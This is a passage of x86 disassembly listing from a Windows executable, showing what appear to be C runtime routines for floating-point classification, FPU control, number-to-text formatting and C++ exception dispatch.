jmp short loc_41C698
; ---------------------------------------------------------------------------
loc_41C65C: ; CODE XREF: sub_41C645+C�j
cmp [ebp+arg_4], 0FFF00000h
jnz short loc_41C66E
cmp [ebp+arg_0], edx
jnz short loc_41C66E
push 2
jmp short loc_41C698
; ---------------------------------------------------------------------------
loc_41C66E: ; CODE XREF: sub_41C645+11�j
; sub_41C645+1E�j ...
mov ecx, [ebp+arg_4+2]
mov eax, 7FF8h
and ecx, eax
cmp cx, ax
jnz short loc_41C681
push 3
jmp short loc_41C698
; ---------------------------------------------------------------------------
loc_41C681: ; CODE XREF: sub_41C645+36�j
cmp cx, 7FF0h
jnz short loc_41C69B
test [ebp+arg_4], 7FFFFh
jnz short loc_41C696
cmp [ebp+arg_0], edx
jz short loc_41C69B
loc_41C696: ; CODE XREF: sub_41C645+4A�j
push 4
loc_41C698: ; CODE XREF: sub_41C645+15�j
; sub_41C645+27�j ...
pop eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41C69B: ; CODE XREF: sub_41C645+41�j
; sub_41C645+4F�j
xor eax, eax
pop ebp
retn
sub_41C645 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41C69F(double,int)
sub_41C69F proc near ; CODE XREF: sub_41C2F3+160�p
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
fld [ebp+arg_0]
fcomp ds:dbl_424818
push esi
fnstsw ax
sahf
jnz short loc_41C6BF
fldz
xor esi, esi
fstp [ebp+var_8]
jmp loc_41C755
; ---------------------------------------------------------------------------
loc_41C6BF: ; CODE XREF: sub_41C69F+12�j
xor ecx, ecx
test word ptr [ebp+arg_0+6], 7FF0h
jnz short loc_41C72E
test dword ptr [ebp+arg_0+4], 0FFFFFh
jnz short loc_41C6D7
cmp dword ptr [ebp+arg_0], ecx
jz short loc_41C72E
loc_41C6D7: ; CODE XREF: sub_41C69F+31�j
fld [ebp+arg_0]
fcomp ds:dbl_424818
mov esi, 0FFFFFC03h
fnstsw ax
sahf
jnb short loc_41C6EF
push 1
pop eax
jmp short loc_41C6F1
; ---------------------------------------------------------------------------
loc_41C6EF: ; CODE XREF: sub_41C69F+49�j
xor eax, eax
loc_41C6F1: ; CODE XREF: sub_41C69F+4E�j
; sub_41C69F+69�j
test byte ptr [ebp+arg_0+6], 10h
jnz short loc_41C70A
shl dword ptr [ebp+arg_0+4], 1
test byte ptr [ebp+arg_0+3], 80h
jz short loc_41C704
or dword ptr [ebp+arg_0+4], 1
loc_41C704: ; CODE XREF: sub_41C69F+5F�j
shl dword ptr [ebp+arg_0], 1
dec esi
jmp short loc_41C6F1
; ---------------------------------------------------------------------------
loc_41C70A: ; CODE XREF: sub_41C69F+56�j
and word ptr [ebp+arg_0+6], 0FFEFh
cmp eax, ecx
jz short loc_41C718
or byte ptr [ebp+arg_0+7], 80h
loc_41C718: ; CODE XREF: sub_41C69F+73�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_41C61C
fstp [ebp+var_8]
add esp, 0Ch
jmp short loc_41C755
; ---------------------------------------------------------------------------
loc_41C72E: ; CODE XREF: sub_41C69F+28�j
; sub_41C69F+36�j
fld [ebp+arg_0]
push ecx ; int
push ecx
push ecx ; double
fstp [esp+18h+var_18]
call sub_41C61C
mov eax, dword ptr [ebp+arg_0+6]
add esp, 0Ch
fstp [ebp+var_8]
shr eax, 4
and ax, 7FFh
movsx esi, ax
sub esi, 3FEh
loc_41C755: ; CODE XREF: sub_41C69F+1B�j
; sub_41C69F+8D�j
mov eax, [ebp+arg_8]
fld [ebp+var_8]
mov [eax], esi
pop esi
leave
retn
sub_41C69F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C760 proc near ; CODE XREF: sub_41C040+F6�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fstsw [ebp+var_2]
movsx eax, [ebp+var_2]
leave
retn
sub_41C760 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C76E proc near ; CODE XREF: sub_41C040+206�p
var_2 = word ptr -2
push ebp
mov ebp, esp
push ecx
fnstsw [ebp+var_2]
fnclex
movsx eax, [ebp+var_2]
leave
retn
sub_41C76E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C77D proc near ; CODE XREF: sub_417CA4+13�p
; sub_417CA4+5D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
fstcw word ptr [ebp+var_4]
mov eax, [ebp+arg_4]
mov ecx, eax
and eax, [ebp+arg_0]
not ecx
and ecx, [ebp+var_4]
or ecx, eax
mov [ebp+arg_4], ecx
fldcw word ptr [ebp+arg_4]
movsx eax, word ptr [ebp+var_4]
leave
retn
sub_41C77D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C7A0 proc near ; CODE XREF: sub_41C2F3+1D�p
; sub_41C2F3+37�p ...
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov cl, byte ptr [ebp+arg_0]
test cl, 1
jz short loc_41C7B7
fld ds:tbyte_43B8E8
fistp [ebp+arg_0]
wait
loc_41C7B7: ; CODE XREF: sub_41C7A0+B�j
test cl, 8
jz short loc_41C7CC
fstsw ax
fld ds:tbyte_43B8E8
fstp [ebp+var_8]
wait
fstsw ax
loc_41C7CC: ; CODE XREF: sub_41C7A0+1A�j
test cl, 10h
jz short loc_41C7DB
fld ds:tbyte_43B8F4
fstp [ebp+var_8]
wait
loc_41C7DB: ; CODE XREF: sub_41C7A0+2F�j
test cl, 4
jz short loc_41C7E9
fldz
fld1
fdivrp st(1), st
fstp st
wait
loc_41C7E9: ; CODE XREF: sub_41C7A0+3E�j
test cl, 20h
jz short locret_41C7F4
fldpi
fstp [ebp+var_8]
wait
locret_41C7F4: ; CODE XREF: sub_41C7A0+4C�j
leave
retn
sub_41C7A0 endp
; =============== S U B R O U T I N E =======================================
sub_41C7F6 proc near ; CODE XREF: sub_417D73+F�p
push 30000h
push 10000h
call sub_4201B7
pop ecx
pop ecx
retn
sub_41C7F6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C808 proc near ; CODE XREF: sub_41C846:loc_41C86A�j
var_18 = qword ptr -18h
var_10 = qword ptr -10h
var_8 = qword ptr -8
push ebp
mov ebp, esp
sub esp, 18h
fld ds:dbl_424828
fstp [ebp+var_8]
fld ds:dbl_424820
fstp [ebp+var_10]
fld [ebp+var_10]
fdiv [ebp+var_8]
fmul [ebp+var_8]
fsubr [ebp+var_10]
fstp [ebp+var_18]
fld [ebp+var_18]
fcomp ds:dbl_4246A8
fnstsw ax
sahf
jbe short loc_41C842
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_41C842: ; CODE XREF: sub_41C808+33�j
xor eax, eax
leave
retn
sub_41C808 endp
; =============== S U B R O U T I N E =======================================
sub_41C846 proc near ; CODE XREF: sub_417D73+5�p
push offset aKernel32 ; "KERNEL32"
call ds:off_424100
test eax, eax
jz short loc_41C86A
push offset aIsprocessorfea ; "IsProcessorFeaturePresent"
push eax
call ds:off_4240DC
test eax, eax
jz short loc_41C86A
push 0
call eax ; sub_417D73
retn
; ---------------------------------------------------------------------------
loc_41C86A: ; CODE XREF: sub_41C846+D�j
; sub_41C846+1D�j
jmp sub_41C808
sub_41C846 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41C86F proc near ; CODE XREF: sub_419E38+3CB�p
; DATA XREF: sub_417D8B+1E�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
movsx eax, byte ptr [esi]
push eax
call sub_419101
cmp eax, 65h
pop ecx
jz short loc_41C8AF
loc_41C883: ; CODE XREF: sub_41C86F+3E�j
inc esi
cmp ds:dword_4397AC, 1
jle short loc_41C89C
movsx eax, byte ptr [esi]
push 4
push eax
call sub_41A642
pop ecx
pop ecx
jmp short loc_41C8AB
; ---------------------------------------------------------------------------
loc_41C89C: ; CODE XREF: sub_41C86F+1C�j
movsx eax, byte ptr [esi]
mov ecx, ds:off_4395A0
mov al, [ecx+eax*2]
and eax, 4
loc_41C8AB: ; CODE XREF: sub_41C86F+2B�j
test eax, eax
jnz short loc_41C883
loc_41C8AF: ; CODE XREF: sub_41C86F+12�j
mov cl, ds:byte_4397B0
mov al, [esi]
mov [esi], cl
inc esi
loc_41C8BA: ; CODE XREF: sub_41C86F+56�j
mov cl, [esi]
mov [esi], al
mov al, cl
mov cl, [esi]
inc esi
test cl, cl
jnz short loc_41C8BA
pop esi
retn
sub_41C86F endp
; =============== S U B R O U T I N E =======================================
sub_41C8C9 proc near ; CODE XREF: sub_419E38+3E2�p
; DATA XREF: sub_417D8B+5�o ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dl, ds:byte_4397B0
mov cl, [eax]
test cl, cl
jz short loc_41C8E5
loc_41C8D9: ; CODE XREF: sub_41C8C9+1A�j
cmp cl, dl
jz short loc_41C8E5
mov cl, [eax+1]
inc eax
test cl, cl
jnz short loc_41C8D9
loc_41C8E5: ; CODE XREF: sub_41C8C9+E�j
; sub_41C8C9+12�j
mov cl, [eax]
inc eax
test cl, cl
jz short locret_41C916
loc_41C8EC: ; CODE XREF: sub_41C8C9+34�j
mov cl, [eax]
test cl, cl
jz short loc_41C8FF
cmp cl, 65h
jz short loc_41C8FF
cmp cl, 45h
jz short loc_41C8FF
inc eax
jmp short loc_41C8EC
; ---------------------------------------------------------------------------
loc_41C8FF: ; CODE XREF: sub_41C8C9+27�j
; sub_41C8C9+2C�j ...
mov ecx, eax
loc_41C901: ; CODE XREF: sub_41C8C9+3C�j
dec eax
cmp byte ptr [eax], 30h
jz short loc_41C901
cmp [eax], dl
jnz short loc_41C90C
dec eax
loc_41C90C: ; CODE XREF: sub_41C8C9+40�j
; sub_41C8C9+4B�j
mov dl, [ecx]
inc eax
inc ecx
test dl, dl
mov [eax], dl
jnz short loc_41C90C
locret_41C916: ; CODE XREF: sub_41C8C9+21�j
retn
sub_41C8C9 endp
; =============== S U B R O U T I N E =======================================
sub_41C917 proc near ; DATA XREF: sub_417D8B+28�o
; _2:off_43B910�o
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
fld qword ptr [eax]
fcomp ds:dbl_424818
fnstsw ax
sahf
jb short loc_41C92C
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_41C92C: ; CODE XREF: sub_41C917+F�j
xor eax, eax
retn
sub_41C917 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C92F proc near ; CODE XREF: sub_41D797+430�p
; DATA XREF: sub_417D8B+14�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_0], 0
push [ebp+arg_8]
jz short loc_41C958
lea eax, [ebp+var_8]
push eax
call sub_42067A
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+var_8]
mov [eax], ecx
mov ecx, [ebp+var_4]
mov [eax+4], ecx
leave
retn
; ---------------------------------------------------------------------------
loc_41C958: ; CODE XREF: sub_41C92F+C�j
lea eax, [ebp+arg_8]
push eax
call sub_4206A7
mov eax, [ebp+arg_4]
pop ecx
pop ecx
mov ecx, [ebp+arg_8]
mov [eax], ecx
leave
retn
sub_41C92F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C96D proc near ; CODE XREF: sub_41CBEA+17�p
; sub_41CC34+47�p
var_10 = qword ptr -10h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp ds:byte_48A084, 0
push ebx
push esi
jz short loc_41C9A2
mov ebx, [ebp+arg_8]
mov eax, ds:dword_48A080
xor ecx, ecx
mov esi, eax
test ebx, ebx
setnle cl
push ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
setz cl
add ecx, [ebp+arg_4]
push ecx
call sub_41CC85
pop ecx
pop ecx
jmp short loc_41C9DA
; ---------------------------------------------------------------------------
loc_41C9A2: ; CODE XREF: sub_41C96D+C�j
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+10h+var_10]
call sub_42074B
mov ebx, [ebp+arg_8]
mov esi, eax
push esi
mov edx, [ebp+arg_4]
lea eax, [ebx+1]
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
xor ecx, ecx
test ebx, ebx
setnle cl
add edx, eax
add ecx, edx
push ecx
call sub_4206D4
add esp, 14h
loc_41C9DA: ; CODE XREF: sub_41C96D+33�j
cmp dword ptr [esi], 2Dh
mov eax, [ebp+arg_4]
jnz short loc_41C9E6
mov byte ptr [eax], 2Dh
inc eax
loc_41C9E6: ; CODE XREF: sub_41C96D+73�j
test ebx, ebx
jle short loc_41C9FE
mov cl, [eax+1]
push edi
lea edi, [eax+1]
mov [eax], cl
mov cl, ds:byte_4397B0
mov eax, edi
pop edi
mov [eax], cl
loc_41C9FE: ; CODE XREF: sub_41C96D+7B�j
xor ecx, ecx
push offset aE000 ; "e+000"
cmp ds:byte_48A084, cl
setz cl
add ecx, eax
add ecx, ebx
push ecx
call sub_4179C0
cmp [ebp+arg_C], 0
pop ecx
pop ecx
mov ecx, eax
jz short loc_41CA25
mov byte ptr [ecx], 45h
loc_41CA25: ; CODE XREF: sub_41C96D+B3�j
mov eax, [esi+0Ch]
inc ecx
cmp byte ptr [eax], 30h
jz short loc_41CA6A
mov ebx, [esi+4]
dec ebx
jns short loc_41CA39
neg ebx
mov byte ptr [ecx], 2Dh
loc_41CA39: ; CODE XREF: sub_41C96D+C5�j
inc ecx
cmp ebx, 64h
jl short loc_41CA50
mov eax, ebx
push 64h
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_41CA50: ; CODE XREF: sub_41C96D+D0�j
inc ecx
cmp ebx, 0Ah
jl short loc_41CA67
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_41CA67: ; CODE XREF: sub_41C96D+E7�j
add [ecx+1], bl
loc_41CA6A: ; CODE XREF: sub_41C96D+BF�j
mov eax, [ebp+arg_4]
pop esi
pop ebx
pop ebp
retn
sub_41C96D endp
; =============== S U B R O U T I N E =======================================
sub_41CA71 proc near ; CODE XREF: sub_41CC11+13�p
; sub_41CC34+1E�p
var_18 = qword ptr -18h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
cmp ds:byte_48A084, 0
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
push edi
jz short loc_41CAAC
mov eax, ds:dword_48A088
mov ebx, [esp+10h+arg_8]
mov esi, ds:dword_48A080
cmp eax, ebx
jnz short loc_41CADC
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebp
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
jmp short loc_41CADC
; ---------------------------------------------------------------------------
loc_41CAAC: ; CODE XREF: sub_41CA71+F�j
mov eax, [esp+10h+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+18h+var_18]
call sub_42074B
mov ebx, [esp+18h+arg_8]
mov esi, eax
push esi
mov eax, [esi+4]
add eax, ebx
push eax
xor eax, eax
cmp dword ptr [esi], 2Dh
setz al
add eax, ebp
push eax
call sub_4206D4
add esp, 14h
loc_41CADC: ; CODE XREF: sub_41CA71+22�j
; sub_41CA71+39�j
cmp dword ptr [esi], 2Dh
mov edi, ebp
jnz short loc_41CAEA
mov byte ptr [ebp+0], 2Dh
lea edi, [ebp+1]
loc_41CAEA: ; CODE XREF: sub_41CA71+70�j
mov eax, [esi+4]
test eax, eax
jg short loc_41CB01
push 1
push edi
call sub_41CC85
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_41CB03
; ---------------------------------------------------------------------------
loc_41CB01: ; CODE XREF: sub_41CA71+7E�j
add edi, eax
loc_41CB03: ; CODE XREF: sub_41CA71+8E�j
test ebx, ebx
jle short loc_41CB48
push 1
push edi
call sub_41CC85
mov al, ds:byte_4397B0
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_41CB48
cmp ds:byte_48A084, 0
jz short loc_41CB2D
neg esi
jmp short loc_41CB33
; ---------------------------------------------------------------------------
loc_41CB2D: ; CODE XREF: sub_41CA71+B6�j
neg esi
cmp ebx, esi
jl short loc_41CB35
loc_41CB33: ; CODE XREF: sub_41CA71+BA�j
mov ebx, esi
loc_41CB35: ; CODE XREF: sub_41CA71+C0�j
push ebx
push edi
call sub_41CC85
push ebx
push 30h
push edi
call sub_417330
add esp, 14h
loc_41CB48: ; CODE XREF: sub_41CA71+94�j
; sub_41CA71+AD�j
pop edi
mov eax, ebp
pop esi
pop ebp
pop ebx
retn
sub_41CA71 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CB4F proc near ; CODE XREF: sub_41CC34+34�p
var_14 = qword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [edi]
fstp [esp+14h+var_14]
call sub_42074B
mov ds:dword_48A080, eax
mov ecx, [eax+4]
dec ecx
mov ebx, [ebp+arg_8]
mov ds:dword_48A088, ecx
xor ecx, ecx
cmp dword ptr [eax], 2Dh
push eax
push ebx
setz cl
add ecx, [ebp+arg_4]
mov esi, ecx
push esi
call sub_4206D4
mov eax, ds:dword_48A080
add esp, 14h
mov ecx, [eax+4]
dec ecx
cmp ds:dword_48A088, ecx
setl cl
mov ds:byte_48A08C, cl
mov eax, [eax+4]
dec eax
cmp eax, 0FFFFFFFCh
mov ds:dword_48A088, eax
jl short loc_41CBD5
cmp eax, ebx
jge short loc_41CBD5
test cl, cl
jz short loc_41CBC6
loc_41CBBC: ; CODE XREF: sub_41CB4F+72�j
mov al, [esi]
inc esi
test al, al
jnz short loc_41CBBC
and [esi-2], al
loc_41CBC6: ; CODE XREF: sub_41CB4F+6B�j
push ebx
push [ebp+arg_4]
push edi
call sub_41CC11
add esp, 0Ch
jmp short loc_41CBE5
; ---------------------------------------------------------------------------
loc_41CBD5: ; CODE XREF: sub_41CB4F+63�j
; sub_41CB4F+67�j
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
push edi
call sub_41CBEA
add esp, 10h
loc_41CBE5: ; CODE XREF: sub_41CB4F+84�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41CB4F endp
; =============== S U B R O U T I N E =======================================
sub_41CBEA proc near ; CODE XREF: sub_41CB4F+8E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push [esp+arg_C]
mov ds:byte_48A084, 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41C96D
and ds:byte_48A084, 0
add esp, 10h
retn
sub_41CBEA endp
; =============== S U B R O U T I N E =======================================
sub_41CC11 proc near ; CODE XREF: sub_41CB4F+7C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_8]
mov ds:byte_48A084, 1
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41CA71
and ds:byte_48A084, 0
add esp, 0Ch
retn
sub_41CC11 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CC34 proc near ; CODE XREF: sub_419E38+3AA�p
; DATA XREF: sub_417D8B�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_41CC6F
cmp [ebp+arg_8], 45h
jz short loc_41CC6F
cmp [ebp+arg_8], 66h
jnz short loc_41CC5C
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CA71
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41CC5C: ; CODE XREF: sub_41CC34+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41CB4F
jmp short loc_41CC80
; ---------------------------------------------------------------------------
loc_41CC6F: ; CODE XREF: sub_41CC34+7�j
; sub_41CC34+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41C96D
loc_41CC80: ; CODE XREF: sub_41CC34+39�j
add esp, 10h
pop ebp
retn
sub_41CC34 endp
; =============== S U B R O U T I N E =======================================
sub_41CC85 proc near ; CODE XREF: sub_41C96D+2C�p
; sub_41CA71+83�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_41CCA8
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_417AB0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_4182C0
add esp, 10h
pop esi
loc_41CCA8: ; CODE XREF: sub_41CC85+7�j
pop edi
retn
sub_41CC85 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CCAA proc near ; CODE XREF: _0:00417F6C�p
; sub_417FD5+1B�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_10]
push edi
mov edi, 19930520h
cmp [esi], edi
jz short loc_41CCC0
call sub_41D552
loc_41CCC0: ; CODE XREF: sub_41CCAA+F�j
mov eax, [ebp+arg_0]
test byte ptr [eax+4], 66h
jz short loc_41CCE8
cmp dword ptr [esi+4], 0
jz short loc_41CD3E
cmp [ebp+arg_14], 0
jnz short loc_41CD3E
push 0FFFFFFFFh
push esi
push [ebp+arg_C]
push [ebp+arg_4]
call sub_41CFF1
add esp, 10h
jmp short loc_41CD3E
; ---------------------------------------------------------------------------
loc_41CCE8: ; CODE XREF: sub_41CCAA+1D�j
cmp dword ptr [esi+0Ch], 0
jz short loc_41CD3E
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41CD22
cmp [eax+14h], edi
jbe short loc_41CD22
mov ecx, [eax+1Ch]
mov ecx, [ecx+8]
test ecx, ecx
jz short loc_41CD22
movzx edx, byte ptr [ebp+arg_1C]
push edx
push [ebp+arg_18]
push [ebp+arg_14]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call ecx
add esp, 20h
jmp short loc_41CD41
; ---------------------------------------------------------------------------
loc_41CD22: ; CODE XREF: sub_41CCAA+4A�j
; sub_41CCAA+4F�j ...
push [ebp+arg_18]
push [ebp+arg_14]
push [ebp+arg_1C]
push esi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push eax
call sub_41CD45
add esp, 20h
loc_41CD3E: ; CODE XREF: sub_41CCAA+23�j
; sub_41CCAA+29�j ...
push 1
pop eax
loc_41CD41: ; CODE XREF: sub_41CCAA+76�j
pop edi
pop esi
pop ebp
retn
sub_41CCAA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CD45 proc near ; CODE XREF: sub_41CCAA+8C�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = byte ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ebp+arg_4]
and byte ptr [ebp+var_14], 0
mov eax, [eax+8]
cmp eax, 0FFFFFFFFh
mov [ebp+var_10], eax
jl short loc_41CD65
mov ecx, [ebp+arg_10]
cmp eax, [ecx+4]
jl short loc_41CD6A
loc_41CD65: ; CODE XREF: sub_41CD45+16�j
call sub_41D552
loc_41CD6A: ; CODE XREF: sub_41CD45+1E�j
push ebx
push esi
mov esi, [ebp+arg_0]
mov ebx, 0E06D7363h
push edi
mov edi, 19930520h
cmp [esi], ebx
jnz loc_41CEC1
cmp dword ptr [esi+10h], 3
jnz short loc_41CDDE
cmp [esi+14h], edi
jnz short loc_41CDDE
cmp dword ptr [esi+1Ch], 0
jnz short loc_41CDDE
mov esi, ds:dword_48A090
test esi, esi
jz loc_41CEBC
mov eax, ds:dword_48A094
push 1
push esi
mov [ebp+arg_8], eax
mov byte ptr [ebp+var_14], 1
call sub_4208D2
pop ecx
test eax, eax
pop ecx
jnz short loc_41CDC0
call sub_41D552
loc_41CDC0: ; CODE XREF: sub_41CD45+74�j
cmp [esi], ebx
jnz loc_41CEC1
cmp dword ptr [esi+10h], 3
jnz short loc_41CDDE
cmp [esi+14h], edi
jnz short loc_41CDDE
cmp dword ptr [esi+1Ch], 0
jnz short loc_41CDDE
call sub_41D552
loc_41CDDE: ; CODE XREF: sub_41CD45+41�j
; sub_41CD45+46�j ...
cmp [esi], ebx
jnz loc_41CEC1
cmp dword ptr [esi+10h], 3
jnz loc_41CEC1
cmp [esi+14h], edi
jnz loc_41CEC1
mov edi, [ebp+var_10]
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
push [ebp+arg_10]
call sub_418123
add esp, 14h
mov ebx, eax
loc_41CE15: ; CODE XREF: sub_41CD45+162�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_18]
jnb loc_41CEAC
cmp [ebx], edi
jg short loc_41CEA1
cmp edi, [ebx+4]
jg short loc_41CEA1
mov eax, [ebx+10h]
mov [ebp+arg_0], eax
mov eax, [ebx+0Ch]
test eax, eax
mov [ebp+var_C], eax
jle short loc_41CE9E
loc_41CE3A: ; CODE XREF: sub_41CD45+131�j
mov eax, [esi+1Ch]
mov eax, [eax+0Ch]
lea edi, [eax+4]
mov eax, [eax]
test eax, eax
mov [ebp+var_8], eax
jle short loc_41CE6B
loc_41CE4C: ; CODE XREF: sub_41CD45+124�j
push dword ptr [esi+1Ch]
push dword ptr [edi]
push [ebp+arg_0]
call sub_41CF94
add esp, 0Ch
test eax, eax
jnz short loc_41CE7A
dec [ebp+var_8]
add edi, 4
cmp [ebp+var_8], eax
jg short loc_41CE4C
loc_41CE6B: ; CODE XREF: sub_41CD45+105�j
dec [ebp+var_C]
add [ebp+arg_0], 10h
cmp [ebp+var_C], 0
jg short loc_41CE3A
jmp short loc_41CE9E
; ---------------------------------------------------------------------------
loc_41CE7A: ; CODE XREF: sub_41CD45+119�j
push [ebp+var_14]
push [ebp+arg_1C]
push [ebp+arg_18]
push ebx
push dword ptr [edi]
push [ebp+arg_0]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_41D0A5
add esp, 2Ch
loc_41CE9E: ; CODE XREF: sub_41CD45+F3�j
; sub_41CD45+133�j
mov edi, [ebp+var_10]
loc_41CEA1: ; CODE XREF: sub_41CD45+DE�j
; sub_41CD45+E3�j
inc [ebp+var_4]
add ebx, 14h
jmp loc_41CE15
; ---------------------------------------------------------------------------
loc_41CEAC: ; CODE XREF: sub_41CD45+D6�j
cmp [ebp+arg_14], 0
jz short loc_41CEBC
push 1
push esi
call sub_41D41A
pop ecx
pop ecx
loc_41CEBC: ; CODE XREF: sub_41CD45+56�j
; sub_41CD45+16B�j ...
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_41CEC1: ; CODE XREF: sub_41CD45+37�j
; sub_41CD45+7D�j ...
cmp [ebp+arg_14], 0
jnz short loc_41CEE7
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+var_10]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push esi
call sub_41CEEC
add esp, 20h
jmp short loc_41CEBC
; ---------------------------------------------------------------------------
loc_41CEE7: ; CODE XREF: sub_41CD45+180�j
jmp sub_41D4FC
sub_41CD45 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CEEC proc near ; CODE XREF: sub_41CD45+198�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push ecx
push ecx
cmp ds:dword_48A098, 0
push esi
push edi
jz short loc_41CF1D
push [ebp+arg_1C]
push [ebp+arg_18]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_417FFA
add esp, 1Ch
test eax, eax
jnz short loc_41CF90
loc_41CF1D: ; CODE XREF: sub_41CEEC+E�j
mov edi, [ebp+arg_14]
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push edi
push [ebp+arg_18]
